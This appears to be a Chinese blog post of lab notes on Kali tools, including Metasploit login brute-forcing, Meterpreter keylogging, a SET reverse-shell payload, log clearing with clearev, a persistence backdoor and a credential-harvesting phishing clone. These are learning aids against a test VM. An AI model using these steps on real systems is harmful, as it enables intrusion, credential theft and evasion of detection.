kali渗透测试一些工具使用

nmap(网络连接端扫描软件)

作为一个漏洞探测器和安全扫描器

命令:

[nmap支持多个端口扫描,不连续的端口用“,”隔开,eg :“80 ,22,3306”;连续的端口用“–”连接,eg:“1-3309”]

nmap -traceroute   域名    对目标主机进行路由追踪

nmap -sP  ip地址    识别活跃主机

nmap -sn  ip地址    存活的主机

nmap -sV  ip地址    扫描所开放的端口

nmap -O   ip地址    获取操作系统信息

nmap -P    ip地址    指定端口范围内运行的服务

   DNS枚举工具(被动收集信息)

dnsenum    (域名信息收集工具)

通过谷歌(默认)或者字典文件猜测可能存在的域名,并对一个网段进行反向查询。

dnsenum  -h   查看帮助信息

dnsenum  enum   域名    枚举域名的相关信息

dnsesnum   --threads   数字   域名     设置线程数(填写合适的数字)

dnsesnum  -w 域名     允许用户启用WHOIS请求

fierce

fierce -h     查看帮助信息 

fierce   --subdomains  域名     枚举域名的相关信息 

fierce  --domain 域名      设置目标

fierce  --dns-server  域名   设置域名解析服务器

     使用armtiage渗透测试

1、虚拟机为NAT模式

2、虚拟机与物理机ping通(若没有,看物理机是否打开了虚拟机的网卡)

3、启动metasploit服务   命令:msfconsole(无图形化界面,终端模式)

     启动armtiage工具  在菜单栏中搜索armtiage,点击图标(进入图形化界面)

  在图形化界面中   

     Hosts——Nmap Scan ——Quick Scan      快速扫描

     对本机进行攻击分析:点击本机图标,进行nmap扫描

    Hosts——Nmap Scan ——Quick Scan (OS  detect)——本机IP地址    进行nmap扫描,探测目标操作系统版本

  选择预置模块exploit/windows/browser/adobe_cooltype_sing,双击选择进行攻击

在终端模式下(虚拟机kali和win7靶机)

准备工作:在靶机中打开PHP,设置MySQL服务器,允许用户远程登录(修改用户主机,采用%作为通配符)

win7靶机和kali为NAT模式

在kali中创建用户名字典文件和密码字典文件

1、启动终端模式 命令:msfconsole

2、搜索扫描的服务模块   命令:search  模块

3、看自己想要的模块 使用序号,命令 :use  模块序号

4、查看登录扫描模块的选项参数,命令:show  options

5、设置扫描目标的IP地址  ,命令:set   rhosts   ip地址

6、设置攻击机的IP地址,命令:set srvhost ip地址

7、设置加载用户名字典文件 ,命令:set user_file  用户名字典文件路径

8、设置加载用户密码字典文件,命令:set pass_file  用户密码字典文件路径

9、启动渗透测试,命令:run/exploit -j

10、Meterpreter监听键盘记录,命令: shell——keyscan_start(在靶机中可新建文档,输入文字数字等) ——keyscan_dump(记录就出来了)

11、测试用户是否远程连接,在终端模式(cmd),命令:mstsc   (登录连接就行)

社会工程学工具包(进行渗透攻击)

准备工作:攻击机和靶机为NAT模式

2、选择攻击——社会工程学  Social - Engineering Attacks    set > 1

3、选择攻击载荷和监听器  Create a Payload and Listener   set > 4

4、选择加载攻击载荷   Windows Reverse_TCP Meterpreter  set >2

5、设置反弹式shell的攻击主机IP地址

6、设置反弹式shell的攻击主机监听端口

7、传递攻击载荷给目标机  eg:在/root/.set中的payload.exe

8、目标机运行攻击载荷     eg:在靶机浏览器登录攻击机的IP地址/payload.exe ,运行文件

9、查看活跃会话 ,  命令: sessions

10、创建和使用后门程序,进入shell环境,命令:sessions -i 1  

  在meterpreter >  之后进入,命令:shell   (有乱码情况,输入  chcp 65001)

  收集目标数据 , 命令: sysinfo 

  清除痕迹 ,命令: clearev (可在win7靶机的 计算机管理——Windows日志——安全   中查看是否清除痕迹)

创建持久后门,命令:run  persistence  -U  -A   -X   -i 10   -p   端口号  -r

测试持久后门,在结果中找到脚本executing  script 后面的文件路径,在win7靶机中查看是否存在

使用web攻击向量构建钓鱼网站

准备 工作:攻击机和靶机为NAT模式

1、启动社会工程学工具包 ,命令:setoolkit

2、选择攻击——社会工程学  Social - Engineering Attacks    set > 1

3、选择web攻击向量  Website Attack Vectors    set > 2

4、选择攻击方法  Credential Harvester Attack Method    set:webattack > 3

5、选择网站克隆  Site Cloner  set: webattack > 2

6、设置攻击机IP地址

7、 设置克隆的网页(可在物理机上登录网页登录页面,复制其路径)

8、靶机访问钓鱼网站(直接访问攻击机的IP地址)

9、在钓鱼网站上登录用户和密码,攻击机会检测到用户名和密码

10、查看相关信息,命令:  cat /root/.set/reports/*.xml

medusa工具的使用

准备工作:攻击机和靶机为NAT模式

1、打开medusa工具,命令: medusa -h

2、各参数的含义:

-h:指定目标主机名或者目标IP地址

-H:指定目标主机名或者目标IP地址文件

-u:指定用户名

-U:指定用户名文件

-p:指定密码

-P:指定密码文件

-c:指定要执行的命令,在成功登录后执行特定操作

-O:指定输出文件的路径,将破解结果保存到该文件中

-e:指定额外的密码检查,取值为n(空密码)、s(用户名=密码)、 ns(同时检查空密码和用户名=密码)

-M:指定协议模块

-m:指定额外的模块特定参数

-d:启用调试模式,输出更多详细的调试信息。

-n:指定目标服务的端口号

-s:指定目标服务的 SSL 端口号

-g:显示模块的通用选项

-r:指定重试次数,当连接失败时尝试重新连接的次数

-R:从指定的检查点继续破解,用于恢复之前中断的破解任务

-t:指定每个主机的并行线程数

-T:指定全局的并行线程数,控制所有目标主机的总线程数

-L:指定每个目标主机的最大登录尝试次数

-f:匹配成功后,停止对当前主机的破解尝试

-F: 匹配成功后停止整个破解任务

-b:指定模块的备用参数

-q:安静模式,减少输出信息

-v:显示信息等级(有0-6个等级)

-w:错误调试级别(有0-10个级别)

-V:显示版本信息

-Z:指定恢复文件的路径,用于恢复之前中断的破解任务

1、打开medusa工具 ,命令:medusa -h

密码生成工具crunch的使用

crunch <min> <max> [charset] [options]

          <min>:生成密码的最小长度
         <max>:生成密码的最大长度
         [charset]:字符集,可省略,默认是数字和大小写字母

-o:将生成的密码保存到指定文件

-t:   指定密码的格式,使用占位符(如^)

-l:   当使用-t时,用于替换占位符

-d:  限制相同字符连续出现的最大次数.

-s:  指定从哪个密码开始生成

-c: 设置产生的密码个数

    占位符:   @    小写字母

                      ,(逗号)大写字母

                      %    数字

                      ^     特殊符号

1、启动crunch工具,命令:crunch

2、查看各参数的含义,命令:man crunch

hydra工具的用法

-l:指定一个用户名
• -L:指定用户名文件路径
• -p:指定一个密码
• -P:指定密码文件路径
• -e:尝试空密码(n)、使用用户名作为密码(s)、反向密码(r)
• -o:将破解结果输出到指定文件
• -t:指定并发任务数,默认16
• -f:当找到第一个有效密码时停止破解
• -s:指定服务的端口号

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值